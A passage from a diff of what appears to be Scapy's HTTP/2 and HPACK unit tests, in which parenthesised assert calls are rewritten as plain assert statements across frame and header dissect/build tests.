b'\xFF\x00') ~ http2 hpack dissect hpacklithdrfldwithincrindexing p = h2.HPackLitHdrFldWithIncrIndexing(b'\x40\x04Test\x04Toto') -assert(p.magic == 1) -assert(p.index == 0) -assert(isinstance(p.hdr_name, h2.HPackHdrString)) -assert(p.hdr_name.type == 0) -assert(p.hdr_name.len == 4) -assert(p.hdr_name.getfieldval('data').origin() == 'Test') -assert(isinstance(p.hdr_value, h2.HPackHdrString)) -assert(p.hdr_value.type == 0) -assert(p.hdr_value.len == 4) -assert(p.hdr_value.getfieldval('data').origin() == 'Toto') +assert p.magic == 1 +assert p.index == 0 +assert isinstance(p.hdr_name, h2.HPackHdrString) +assert p.hdr_name.type == 0 +assert p.hdr_name.len == 4 +assert p.hdr_name.getfieldval('data').origin() == 'Test' +assert isinstance(p.hdr_value, h2.HPackHdrString) +assert p.hdr_value.type == 0 +assert p.hdr_value.len == 4 +assert p.hdr_value.getfieldval('data').origin() == 'Toto' = HTTP/2 Dissect HPackLitHdrFldWithIncrIndexing with indexed name ~ http2 hpack dissect hpacklithdrfldwithincrindexing p = h2.HPackLitHdrFldWithIncrIndexing(b'\x41\x04Toto') -assert(p.magic == 1) -assert(p.index == 1) -assert(p.hdr_name is None) -assert(isinstance(p.hdr_value, h2.HPackHdrString)) -assert(p.hdr_value.type == 0) -assert(p.hdr_value.len == 4) -assert(p.hdr_value.getfieldval('data').origin() == 'Toto') +assert p.magic == 1 +assert p.index == 1 +assert p.hdr_name is None +assert isinstance(p.hdr_value, h2.HPackHdrString) +assert p.hdr_value.type == 0 +assert p.hdr_value.len == 4 +assert p.hdr_value.getfieldval('data').origin() == 'Toto' = HTTP/2 Build HPackLitHdrFldWithIncrIndexing without indexed name @@ -535,7 +535,7 @@ p = h2.HPackLitHdrFldWithIncrIndexing( hdr_name=h2.HPackHdrString(data=h2.HPackLiteralString('Test')), hdr_value=h2.HPackHdrString(data=h2.HPackLiteralString(b'Toto')) ) -assert(raw(p) == b'\x40\x04Test\x04Toto') +assert raw(p) == b'\x40\x04Test\x04Toto' = HTTP/2 Build HPackLitHdrFldWithIncrIndexing with indexed name ~ http2 hpack build hpacklithdrfldwithincrindexing @@ -544,7 +544,7 @@ p = h2.HPackLitHdrFldWithIncrIndexing( index=1, hdr_value=h2.HPackHdrString(data=h2.HPackLiteralString(b'Toto')) ) -assert(raw(p) == b'\x41\x04Toto') +assert raw(p) == b'\x41\x04Toto' + HTTP/2 HPackLitHdrFldWithoutIndexing Test Suite @@ -552,51 +552,51 @@ assert(raw(p) == b'\x41\x04Toto') ~ http2 hpack dissect hpacklithdrfldwithoutindexing p = h2.HPackLitHdrFldWithoutIndexing(b'\x00\x04Test\x04Toto') -assert(p.magic == 0) -assert(p.never_index == 0) -assert(p.index == 0) -assert(isinstance(p.hdr_name, h2.HPackHdrString)) -assert(p.hdr_name.type == 0) -assert(p.hdr_name.len == 4) -assert(isinstance(p.hdr_name.getfieldval('data'), h2.HPackLiteralString)) -assert(p.hdr_name.getfieldval('data').origin() == 'Test') -assert(isinstance(p.hdr_value, h2.HPackHdrString)) -assert(p.hdr_value.type == 0) -assert(p.hdr_value.len == 4) -assert(isinstance(p.hdr_value.getfieldval('data'), h2.HPackLiteralString)) -assert(p.hdr_value.getfieldval('data').origin() == 'Toto') +assert p.magic == 0 +assert p.never_index == 0 +assert p.index == 0 +assert isinstance(p.hdr_name, h2.HPackHdrString) +assert p.hdr_name.type == 0 +assert p.hdr_name.len == 4 +assert isinstance(p.hdr_name.getfieldval('data'), h2.HPackLiteralString) +assert p.hdr_name.getfieldval('data').origin() == 'Test' +assert isinstance(p.hdr_value, h2.HPackHdrString) +assert p.hdr_value.type == 0 +assert p.hdr_value.len == 4 +assert isinstance(p.hdr_value.getfieldval('data'), h2.HPackLiteralString) +assert p.hdr_value.getfieldval('data').origin() == 'Toto' = HTTP/2 Dissect HPackLitHdrFldWithoutIndexing : never index index and no index ~ http2 hpack dissect hpacklithdrfldwithoutindexing p = h2.HPackLitHdrFldWithoutIndexing(b'\x10\x04Test\x04Toto') -assert(p.magic == 0) -assert(p.never_index == 1) -assert(p.index == 0) -assert(isinstance(p.hdr_name, h2.HPackHdrString)) -assert(p.hdr_name.type == 0) -assert(p.hdr_name.len == 4) -assert(isinstance(p.hdr_name.getfieldval('data'), h2.HPackLiteralString)) -assert(p.hdr_name.getfieldval('data').origin() == 'Test') -assert(isinstance(p.hdr_value, h2.HPackHdrString)) -assert(p.hdr_value.type == 0) -assert(p.hdr_value.len == 4) -assert(isinstance(p.hdr_value.getfieldval('data'), h2.HPackLiteralString)) -assert(p.hdr_value.getfieldval('data').origin() == 'Toto') +assert p.magic == 0 +assert p.never_index == 1 +assert p.index == 0 +assert isinstance(p.hdr_name, h2.HPackHdrString) +assert p.hdr_name.type == 0 +assert p.hdr_name.len == 4 +assert isinstance(p.hdr_name.getfieldval('data'), h2.HPackLiteralString) +assert p.hdr_name.getfieldval('data').origin() == 'Test' +assert isinstance(p.hdr_value, h2.HPackHdrString) +assert p.hdr_value.type == 0 +assert p.hdr_value.len == 4 +assert isinstance(p.hdr_value.getfieldval('data'), h2.HPackLiteralString) +assert p.hdr_value.getfieldval('data').origin() == 'Toto' = HTTP/2 Dissect HPackLitHdrFldWithoutIndexing : never index and indexed name ~ http2 hpack dissect hpacklithdrfldwithoutindexing p = h2.HPackLitHdrFldWithoutIndexing(b'\x11\x04Toto') -assert(p.magic == 0) -assert(p.never_index == 1) -assert(p.index == 1) -assert(p.hdr_name is None) -assert(isinstance(p.hdr_value, h2.HPackHdrString)) -assert(p.hdr_value.type == 0) -assert(p.hdr_value.len == 4) -assert(isinstance(p.hdr_value.getfieldval('data'), h2.HPackLiteralString)) -assert(p.hdr_value.getfieldval('data').origin() == 'Toto') +assert p.magic == 0 +assert p.never_index == 1 +assert p.index == 1 +assert p.hdr_name is None +assert isinstance(p.hdr_value, h2.HPackHdrString) +assert p.hdr_value.type == 0 +assert p.hdr_value.len == 4 +assert isinstance(p.hdr_value.getfieldval('data'), h2.HPackLiteralString) +assert p.hdr_value.getfieldval('data').origin() == 'Toto' = HTTP/2 Build HPackLitHdrFldWithoutIndexing : don't index and no index ~ http2 hpack build hpacklithdrfldwithoutindexing @@ -605,7 +605,7 @@ p = h2.HPackLitHdrFldWithoutIndexing( hdr_name=h2.HPackHdrString(data=h2.HPackLiteralString('Test')), hdr_value=h2.HPackHdrString(data=h2.HPackLiteralString(b'Toto')) ) -assert(raw(p) == b'\x00\x04Test\x04Toto') +assert raw(p) == b'\x00\x04Test\x04Toto' = HTTP/2 Build HPackLitHdrFldWithoutIndexing : never index index and no index ~ http2 hpack build hpacklithdrfldwithoutindexing @@ -615,7 +615,7 @@ p = h2.HPackLitHdrFldWithoutIndexing( hdr_name=h2.HPackHdrString(data=h2.HPackLiteralString('Test')), hdr_value=h2.HPackHdrString(data=h2.HPackLiteralString(b'Toto')) ) -assert(raw(p) == b'\x10\x04Test\x04Toto') +assert raw(p) == b'\x10\x04Test\x04Toto' = HTTP/2 Build HPackLitHdrFldWithoutIndexing : never index and indexed name ~ http2 hpack build hpacklithdrfldwithoutindexing @@ -625,7 +625,7 @@ p = h2.HPackLitHdrFldWithoutIndexing( index=1, hdr_value=h2.HPackHdrString(data=h2.HPackLiteralString(b'Toto')) ) -assert(raw(p) == b'\x11\x04Toto') +assert raw(p) == b'\x11\x04Toto' + HTTP/2 HPackDynamicSizeUpdate Test Suite @@ -633,19 +633,19 @@ assert(raw(p) == b'\x11\x04Toto') ~ http2 hpack dissect hpackdynamicsizeupdate p = h2.HPackDynamicSizeUpdate(b'\x25') -assert(p.magic == 1) -assert(p.max_size == 5) +assert p.magic == 1 +assert p.max_size == 5 p = h2.HPackDynamicSizeUpdate(b'\x3F\x00') -assert(p.magic == 1) -assert(p.max_size == 31) +assert p.magic == 1 +assert p.max_size == 31 = HTTP/2 Build HPackDynamicSizeUpdate ~ http2 hpack build hpackdynamicsizeupdate p = h2.HPackDynamicSizeUpdate(max_size=5) -assert(raw(p) == b'\x25') +assert raw(p) == b'\x25' p = h2.HPackDynamicSizeUpdate(max_size=31) -assert(raw(p) == b'\x3F\x00') +assert raw(p) == b'\x3F\x00' + HTTP/2 Data Frame Test Suite @@ -653,85 +653,85 @@ assert(raw(p) == b'\x3F\x00') ~ http2 frame dissect data pkt = h2.H2Frame(b'\x00\x00\x04\x00\x00\x00\x00\x00\x01ABCD') -assert(pkt.type == 0) -assert(pkt.len == 4) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2DataFrame)) -assert(pkt[h2.H2DataFrame]) -assert(pkt.payload.data == b'ABCD') -assert(isinstance(pkt.payload.payload, scapy.packet.NoPayload)) +assert pkt.type == 0 +assert pkt.len == 4 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2DataFrame) +assert pkt[h2.H2DataFrame] +assert pkt.payload.data == b'ABCD' +assert isinstance(pkt.payload.payload, scapy.packet.NoPayload) = HTTP/2 Build Data Frame: Simple data frame ~ http2 frame build data pkt = h2.H2Frame(stream_id = 1)/h2.H2DataFrame(data='ABCD') -assert(raw(pkt) == b'\x00\x00\x04\x00\x00\x00\x00\x00\x01ABCD') +assert raw(pkt) == b'\x00\x00\x04\x00\x00\x00\x00\x00\x01ABCD' try: pkt.show2(dump=True) - assert(True) + assert True except Exception: - assert(False) + assert False = HTTP/2 Dissect Data Frame: Simple data frame with padding ~ http2 frame dissect data pkt = h2.H2Frame(b'\x00\x00\r\x00\x08\x00\x00\x00\x01\x08ABCD\x00\x00\x00\x00\x00\x00\x00\x00') #Padded data frame -assert(pkt.type == 0) -assert(pkt.len == 13) -assert(len(pkt.flags) == 1) -assert('P' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2PaddedDataFrame)) -assert(pkt[h2.H2PaddedDataFrame]) -assert(pkt.payload.padlen == 8) -assert(pkt.payload.data == b'ABCD') -assert(pkt.payload.padding == b'\x00'*8) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(isinstance(pkt.payload.payload, scapy.packet.NoPayload)) +assert pkt.type == 0 +assert pkt.len == 13 +assert len(pkt.flags) == 1 +assert 'P' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2PaddedDataFrame) +assert pkt[h2.H2PaddedDataFrame] +assert pkt.payload.padlen == 8 +assert pkt.payload.data == b'ABCD' +assert pkt.payload.padding == b'\x00'*8 +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert isinstance(pkt.payload.payload, scapy.packet.NoPayload) = HTTP/2 Build Data Frame: Simple data frame with padding ~ http2 frame build data pkt = h2.H2Frame(flags = {'P'}, stream_id = 1)/h2.H2PaddedDataFrame(data='ABCD', padding=b'\x00'*8) -assert(raw(pkt) == b'\x00\x00\r\x00\x08\x00\x00\x00\x01\x08ABCD\x00\x00\x00\x00\x00\x00\x00\x00') +assert raw(pkt) == b'\x00\x00\r\x00\x08\x00\x00\x00\x01\x08ABCD\x00\x00\x00\x00\x00\x00\x00\x00' try: pkt.show2(dump=True) - assert(True) + assert True except Exception: - assert(False) + assert False = HTTP/2 Dissect Data Frame: Simple data frame with padding and end stream flag ~ http2 frame dissect data pkt = h2.H2Frame(b'\x00\x00\r\x00\t\x00\x00\x00\x01\x08ABCD\x00\x00\x00\x00\x00\x00\x00\x00') #Padded data frame with end stream flag -assert(pkt.type == 0) -assert(pkt.len == 13) -assert(len(pkt.flags) == 2) -assert('P' in pkt.flags) -assert('ES' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2PaddedDataFrame)) -assert(pkt[h2.H2PaddedDataFrame]) -assert(pkt.payload.padlen == 8) -assert(pkt.payload.data == b'ABCD') -assert(pkt.payload.padding == b'\x00'*8) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(isinstance(pkt.payload.payload, scapy.packet.NoPayload)) +assert pkt.type == 0 +assert pkt.len == 13 +assert len(pkt.flags) == 2 +assert 'P' in pkt.flags +assert 'ES' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2PaddedDataFrame) +assert pkt[h2.H2PaddedDataFrame] +assert pkt.payload.padlen == 8 +assert pkt.payload.data == b'ABCD' +assert pkt.payload.padding == b'\x00'*8 +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert isinstance(pkt.payload.payload, scapy.packet.NoPayload) = HTTP/2 Build Data Frame: Simple data frame with padding and end stream flag ~ http2 frame build data pkt = h2.H2Frame(flags = {'P', 'ES'}, stream_id=1)/h2.H2PaddedDataFrame(data='ABCD', padding=b'\x00'*8) -assert(raw(pkt) == b'\x00\x00\r\x00\t\x00\x00\x00\x01\x08ABCD\x00\x00\x00\x00\x00\x00\x00\x00') +assert raw(pkt) == b'\x00\x00\r\x00\t\x00\x00\x00\x01\x08ABCD\x00\x00\x00\x00\x00\x00\x00\x00' try: pkt.show2(dump=True) - assert(True) + assert True except Exception: - assert(False) + assert False + HTTP/2 Headers Frame Test Suite @@ -739,30 +739,30 @@ except Exception: ~ http2 frame dissect headers pkt = h2.H2Frame(b'\x00\x00\x0e\x01\x00\x00\x00\x00\x01\x88\x0f\x10\ntext/plain') #Header frame -assert(pkt.type == 1) -assert(pkt.len == 14) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2HeadersFrame)) -assert(pkt[h2.H2HeadersFrame]) +assert pkt.type == 1 +assert pkt.len == 14 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2HeadersFrame) +assert pkt[h2.H2HeadersFrame] hf = pkt[h2.H2HeadersFrame] -assert(len(hf.hdrs) == 2) -assert(isinstance(hf.hdrs[0], h2.HPackIndexedHdr)) -assert(hf.hdrs[0].magic == 1) -assert(hf.hdrs[0].index == 8) -assert(isinstance(hf.hdrs[1], h2.HPackLitHdrFldWithoutIndexing)) -assert(hf.hdrs[1].magic == 0) -assert(hf.hdrs[1].never_index == 0) -assert(hf.hdrs[1].index == 31) -assert(hf.hdrs[1].hdr_name is None) -assert(expect_exception(AttributeError, 'hf.hdrs[1].non_existant')) -assert(isinstance(hf.hdrs[1].hdr_value, h2.HPackHdrString)) +assert len(hf.hdrs) == 2 +assert isinstance(hf.hdrs[0], h2.HPackIndexedHdr) +assert hf.hdrs[0].magic == 1 +assert hf.hdrs[0].index == 8 +assert isinstance(hf.hdrs[1], h2.HPackLitHdrFldWithoutIndexing) +assert hf.hdrs[1].magic == 0 +assert hf.hdrs[1].never_index == 0 +assert hf.hdrs[1].index == 31 +assert hf.hdrs[1].hdr_name is None +assert expect_exception(AttributeError, 'hf.hdrs[1].non_existant') +assert isinstance(hf.hdrs[1].hdr_value, h2.HPackHdrString) s = hf.hdrs[1].hdr_value -assert(s.type == 0) -assert(s.len == 10) -assert(s.getfieldval('data').origin() == 'text/plain') -assert(isinstance(hf.payload, scapy.packet.NoPayload)) +assert s.type == 0 +assert s.len == 10 +assert s.getfieldval('data').origin() == 'text/plain' +assert isinstance(hf.payload, scapy.packet.NoPayload) = HTTP/2 Build Headers Frame: Simple header frame ~ http2 frame build headers @@ -775,40 +775,40 @@ p = h2.H2Frame(stream_id=1)/h2.H2HeadersFrame(hdrs=[ ) ] ) -assert(raw(p) == b'\x00\x00\x0e\x01\x00\x00\x00\x00\x01\x88\x0f\x10\ntext/plain') +assert raw(p) == b'\x00\x00\x0e\x01\x00\x00\x00\x00\x01\x88\x0f\x10\ntext/plain' = HTTP/2 Dissect Headers Frame: Header frame with padding ~ http2 frame dissect headers pkt = h2.H2Frame(b'\x00\x00\x17\x01\x08\x00\x00\x00\x01\x08\x88\x0f\x10\ntext/plain\x00\x00\x00\x00\x00\x00\x00\x00') #Header frame with padding -assert(pkt.type == 1) -assert(pkt.len == 23) -assert(len(pkt.flags) == 1) -assert('P' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2PaddedHeadersFrame)) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(pkt[h2.H2PaddedHeadersFrame]) +assert pkt.type == 1 +assert pkt.len == 23 +assert len(pkt.flags) == 1 +assert 'P' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2PaddedHeadersFrame) +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert pkt[h2.H2PaddedHeadersFrame] hf = pkt[h2.H2PaddedHeadersFrame] -assert(hf.padlen == 8) -assert(hf.padding == b'\x00' * 8) -assert(len(hf.hdrs) == 2) -assert(isinstance(hf.hdrs[0], h2.HPackIndexedHdr)) -assert(hf.hdrs[0].magic == 1) -assert(hf.hdrs[0].index == 8) -assert(isinstance(hf.hdrs[1], h2.HPackLitHdrFldWithoutIndexing)) -assert(hf.hdrs[1].magic == 0) -assert(hf.hdrs[1].never_index == 0) -assert(hf.hdrs[1].index == 31) -assert(hf.hdrs[1].hdr_name is None) -assert(expect_exception(AttributeError, 'hf.hdrs[1].non_existant')) -assert(isinstance(hf.hdrs[1].hdr_value, h2.HPackHdrString)) +assert hf.padlen == 8 +assert hf.padding == b'\x00' * 8 +assert len(hf.hdrs) == 2 +assert isinstance(hf.hdrs[0], h2.HPackIndexedHdr) +assert hf.hdrs[0].magic == 1 +assert hf.hdrs[0].index == 8 +assert isinstance(hf.hdrs[1], h2.HPackLitHdrFldWithoutIndexing) +assert hf.hdrs[1].magic == 0 +assert hf.hdrs[1].never_index == 0 +assert hf.hdrs[1].index == 31 +assert hf.hdrs[1].hdr_name is None +assert expect_exception(AttributeError, 'hf.hdrs[1].non_existant') +assert isinstance(hf.hdrs[1].hdr_value, h2.HPackHdrString) s = hf.hdrs[1].hdr_value -assert(s.type == 0) -assert(s.len == 10) -assert(s.getfieldval('data').origin() == 'text/plain') -assert(isinstance(hf.payload, scapy.packet.NoPayload)) +assert s.type == 0 +assert s.len == 10 +assert s.getfieldval('data').origin() == 'text/plain' +assert isinstance(hf.payload, scapy.packet.NoPayload) = HTTP/2 Build Headers Frame: Header frame with padding ~ http2 frame build headers @@ -823,41 +823,41 @@ p = h2.H2Frame(flags={'P'}, stream_id=1)/h2.H2PaddedHeadersFrame( ], padding=b'\x00'*8, ) -assert(raw(p) == b'\x00\x00\x17\x01\x08\x00\x00\x00\x01\x08\x88\x0f\x10\ntext/plain\x00\x00\x00\x00\x00\x00\x00\x00') +assert raw(p) == b'\x00\x00\x17\x01\x08\x00\x00\x00\x01\x08\x88\x0f\x10\ntext/plain\x00\x00\x00\x00\x00\x00\x00\x00' = HTTP/2 Dissect Headers Frame: Header frame with priority ~ http2 frame dissect headers pkt = h2.H2Frame(b'\x00\x00\x13\x01 \x00\x00\x00\x01\x00\x00\x00\x02d\x88\x0f\x10\ntext/plain') #Header frame with priority -assert(pkt.type == 1) -assert(pkt.len == 19) -assert(len(pkt.flags) == 1) -assert('+' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2PriorityHeadersFrame)) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(pkt[h2.H2PriorityHeadersFrame]) +assert pkt.type == 1 +assert pkt.len == 19 +assert len(pkt.flags) == 1 +assert '+' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2PriorityHeadersFrame) +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert pkt[h2.H2PriorityHeadersFrame] hf = pkt[h2.H2PriorityHeadersFrame] -assert(hf.exclusive == 0) -assert(hf.stream_dependency == 2) -assert(hf.weight == 100) -assert(len(hf.hdrs) == 2) -assert(isinstance(hf.hdrs[0], h2.HPackIndexedHdr)) -assert(hf.hdrs[0].magic == 1) -assert(hf.hdrs[0].index == 8) -assert(isinstance(hf.hdrs[1], h2.HPackLitHdrFldWithoutIndexing)) -assert(hf.hdrs[1].magic == 0) -assert(hf.hdrs[1].never_index == 0) -assert(hf.hdrs[1].index == 31) -assert(hf.hdrs[1].hdr_name is None) -assert(expect_exception(AttributeError, 'hf.hdrs[1].non_existant')) -assert(isinstance(hf.hdrs[1].hdr_value, h2.HPackHdrString)) +assert hf.exclusive == 0 +assert hf.stream_dependency == 2 +assert hf.weight == 100 +assert len(hf.hdrs) == 2 +assert isinstance(hf.hdrs[0], h2.HPackIndexedHdr) +assert hf.hdrs[0].magic == 1 +assert hf.hdrs[0].index == 8 +assert isinstance(hf.hdrs[1], h2.HPackLitHdrFldWithoutIndexing) +assert hf.hdrs[1].magic == 0 +assert hf.hdrs[1].never_index == 0 +assert hf.hdrs[1].index == 31 +assert hf.hdrs[1].hdr_name is None +assert expect_exception(AttributeError, 'hf.hdrs[1].non_existant') +assert isinstance(hf.hdrs[1].hdr_value, h2.HPackHdrString) s = hf.hdrs[1].hdr_value -assert(s.type == 0) -assert(s.len == 10) -assert(s.getfieldval('data').origin() == 'text/plain') -assert(isinstance(hf.payload, scapy.packet.NoPayload)) +assert s.type == 0 +assert s.len == 10 +assert s.getfieldval('data').origin() == 'text/plain' +assert isinstance(hf.payload, scapy.packet.NoPayload) = HTTP/2 Build Headers Frame: Header frame with priority ~ http2 frame build headers @@ -874,46 +874,46 @@ p = h2.H2Frame(flags={'+'}, stream_id=1)/h2.H2PriorityHeadersFrame( ) ] ) -assert(raw(p) == b'\x00\x00\x13\x01 \x00\x00\x00\x01\x00\x00\x00\x02d\x88\x0f\x10\ntext/plain') +assert raw(p) == b'\x00\x00\x13\x01 \x00\x00\x00\x01\x00\x00\x00\x02d\x88\x0f\x10\ntext/plain' = HTTP/2 Dissect Headers Frame: Header frame with priority and padding and flags ~ http2 frame dissect headers pkt = h2.H2Frame(b'\x00\x00\x1c\x01-\x00\x00\x00\x01\x08\x00\x00\x00\x02d\x88\x0f\x10\ntext/plain\x00\x00\x00\x00\x00\x00\x00\x00') #Header frame with priority and padding and flags ES|EH -assert(pkt.type == 1) -assert(pkt.len == 28) -assert(len(pkt.flags) == 4) -assert('+' in pkt.flags) -assert('P' in pkt.flags) -assert('ES' in pkt.flags) -assert('EH' in pkt.flags) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2PaddedPriorityHeadersFrame)) -assert(flags_bit_pattern.search(pkt.show(dump=True)) is None) -assert(pkt[h2.H2PaddedPriorityHeadersFrame]) +assert pkt.type == 1 +assert pkt.len == 28 +assert len(pkt.flags) == 4 +assert '+' in pkt.flags +assert 'P' in pkt.flags +assert 'ES' in pkt.flags +assert 'EH' in pkt.flags +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2PaddedPriorityHeadersFrame) +assert flags_bit_pattern.search(pkt.show(dump=True)) is None +assert pkt[h2.H2PaddedPriorityHeadersFrame] hf = pkt[h2.H2PaddedPriorityHeadersFrame] -assert(hf.padlen == 8) -assert(hf.padding == b'\x00' * 8) -assert(hf.exclusive == 0) -assert(hf.stream_dependency == 2) -assert(hf.weight == 100) -assert(len(hf.hdrs) == 2) -assert(isinstance(hf.hdrs[0], h2.HPackIndexedHdr)) -assert(hf.hdrs[0].magic == 1) -assert(hf.hdrs[0].index == 8) -assert(isinstance(hf.hdrs[1], h2.HPackLitHdrFldWithoutIndexing)) -assert(hf.hdrs[1].magic == 0) -assert(hf.hdrs[1].never_index == 0) -assert(hf.hdrs[1].index == 31) -assert(hf.hdrs[1].hdr_name is None) -assert(expect_exception(AttributeError, 'hf.hdrs[1].non_existant')) -assert(isinstance(hf.hdrs[1].hdr_value, h2.HPackHdrString)) +assert hf.padlen == 8 +assert hf.padding == b'\x00' * 8 +assert hf.exclusive == 0 +assert hf.stream_dependency == 2 +assert hf.weight == 100 +assert len(hf.hdrs) == 2 +assert isinstance(hf.hdrs[0], h2.HPackIndexedHdr) +assert hf.hdrs[0].magic == 1 +assert hf.hdrs[0].index == 8 +assert isinstance(hf.hdrs[1], h2.HPackLitHdrFldWithoutIndexing) +assert hf.hdrs[1].magic == 0 +assert hf.hdrs[1].never_index == 0 +assert hf.hdrs[1].index == 31 +assert hf.hdrs[1].hdr_name is None +assert expect_exception(AttributeError, 'hf.hdrs[1].non_existant') +assert isinstance(hf.hdrs[1].hdr_value, h2.HPackHdrString) s = hf.hdrs[1].hdr_value -assert(s.type == 0) -assert(s.len == 10) -assert(s.getfieldval('data').origin() == 'text/plain') -assert(isinstance(hf.payload, scapy.packet.NoPayload)) +assert s.type == 0 +assert s.len == 10 +assert s.getfieldval('data').origin() == 'text/plain' +assert isinstance(hf.payload, scapy.packet.NoPayload) = HTTP/2 Build Headers Frame: Header frame with priority and padding and flags ~ http2 frame build headers @@ -938,17 +938,17 @@ p = h2.H2Frame(flags={'P', '+', 'ES', 'EH'}, stream_id=1)/h2.H2PaddedPriorityHea ~ http2 frame dissect priority pkt = h2.H2Frame(b'\x00\x00\x05\x02\x00\x00\x00\x00\x03\x80\x00\x00\x01d') -assert(pkt.type == 2) -assert(pkt.len == 5) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 3) -assert(isinstance(pkt.payload, h2.H2PriorityFrame)) -assert(pkt[h2.H2PriorityFrame]) +assert pkt.type == 2 +assert pkt.len == 5 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 3 +assert isinstance(pkt.payload, h2.H2PriorityFrame) +assert pkt[h2.H2PriorityFrame] pp = pkt[h2.H2PriorityFrame] -assert(pp.stream_dependency == 1) -assert(pp.exclusive == 1) -assert(pp.weight == 100) +assert pp.stream_dependency == 1 +assert pp.exclusive == 1 +assert pp.weight == 100 = HTTP/2 Build Priority Frame ~ http2 frame build priority @@ -958,7 +958,7 @@ p = h2.H2Frame(stream_id=3)/h2.H2PriorityFrame( stream_dependency=1, weight=100 ) -assert(raw(p) == b'\x00\x00\x05\x02\x00\x00\x00\x00\x03\x80\x00\x00\x01d') +assert raw(p) == b'\x00\x00\x05\x02\x00\x00\x00\x00\x03\x80\x00\x00\x01d' + HTTP/2 Reset Stream Frame Test Suite @@ -966,46 +966,46 @@ assert(raw(p) == b'\x00\x00\x05\x02\x00\x00\x00\x00\x03\x80\x00\x00\x01d') ~ http2 frame dissect rststream pkt = h2.H2Frame(b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x00\x00\x01') #Reset stream with protocol error -assert(pkt.type == 3) -assert(pkt.len == 4) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2ResetFrame)) -assert(pkt[h2.H2ResetFrame]) +assert pkt.type == 3 +assert pkt.len == 4 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2ResetFrame) +assert pkt[h2.H2ResetFrame] rf = pkt[h2.H2ResetFrame] -assert(rf.error == 1) -assert(isinstance(rf.payload, scapy.packet.NoPayload)) +assert rf.error == 1 +assert isinstance(rf.payload, scapy.packet.NoPayload) = HTTP/2 Build Reset Stream Frame: Protocol Error ~ http2 frame build rststream p = h2.H2Frame(stream_id=1)/h2.H2ResetFrame(error='Protocol error') -assert(raw(p) == b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x00\x00\x01') +assert raw(p) == b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x00\x00\x01' p = h2.H2Frame(stream_id=1)/h2.H2ResetFrame(error=1) -assert(raw(p) == b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x00\x00\x01') +assert raw(p) == b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x00\x00\x01' = HTTP/2 Dissect Reset Stream Frame: Raw 123456 error ~ http2 frame dissect rststream pkt = h2.H2Frame(b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x01\xe2@') #Reset stream with raw error -assert(pkt.type == 3) -assert(pkt.len == 4) -assert(len(pkt.flags) == 0) -assert(pkt.reserved == 0) -assert(pkt.stream_id == 1) -assert(isinstance(pkt.payload, h2.H2ResetFrame)) -assert(pkt[h2.H2ResetFrame]) +assert pkt.type == 3 +assert pkt.len == 4 +assert len(pkt.flags) == 0 +assert pkt.reserved == 0 +assert pkt.stream_id == 1 +assert isinstance(pkt.payload, h2.H2ResetFrame) +assert pkt[h2.H2ResetFrame] rf = pkt[h2.H2ResetFrame] -assert(rf.error == 123456) -assert(isinstance(rf.payload, scapy.packet.NoPayload)) +assert rf.error == 123456 +assert isinstance(rf.payload, scapy.packet.NoPayload) = HTTP/2 Dissect Reset Stream Frame: Raw 123456 error ~ http2 frame dissect rststream p = h2.H2Frame(stream_id=1)/h2.H2ResetFrame(error=123456) -assert(raw(p) == b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x01\xe2@') +assert raw(p) == b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x01\xe2@' + HTTP/2 Settings Frame Test Suite @@ -1013,34 +1013,34 @@ assert(raw(p) == b'\x00\x00\x04\x03\x00\x00\x00\x00\x01\x00\x01\xe2@') ~ http2 frame dissect settings pkt = 